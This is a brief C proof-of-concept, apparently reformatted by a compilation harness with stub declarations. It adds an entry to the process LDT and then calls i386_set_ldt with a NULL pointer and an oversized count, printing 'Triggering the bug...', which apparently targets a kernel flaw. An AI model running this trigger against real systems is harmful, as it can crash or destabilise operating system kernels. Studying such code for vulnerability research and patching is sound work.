
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef union descriptor {int dummy; } descriptor ;
struct segment_descriptor {int member_4; int member_7; int member_9; int member_8; int member_6; int member_5; int member_3; int member_2; int member_1; int member_0; } ;


 int EX_OSERR ;
 int LDT_AUTO_ALLOC ;
 int SDT_MEMRW ;
 int SEL_UPL ;
 int err (int ,char*) ;
 int i386_set_ldt (int,union descriptor*,int) ;
 int printf (char*,...) ;

int main(int argc, char **argv){

    int res;

    struct segment_descriptor desc = {0, 0, SDT_MEMRW, SEL_UPL, 1, 0, 0, 1, 0 ,0};

    printf("[+] Adding an initial entry to the process LDT...\n");
    res = i386_set_ldt(LDT_AUTO_ALLOC, (union descriptor *) &desc, 1);
    if (res < 0){
        err(EX_OSERR, "i386_set_ldt(LDT_AUTO_ALLOC)");
    }
    printf("returned index: %d\n", res);

    printf("Triggering the bug...\n");
    res = i386_set_ldt(1, ((void*)0), 0x80000000);
}
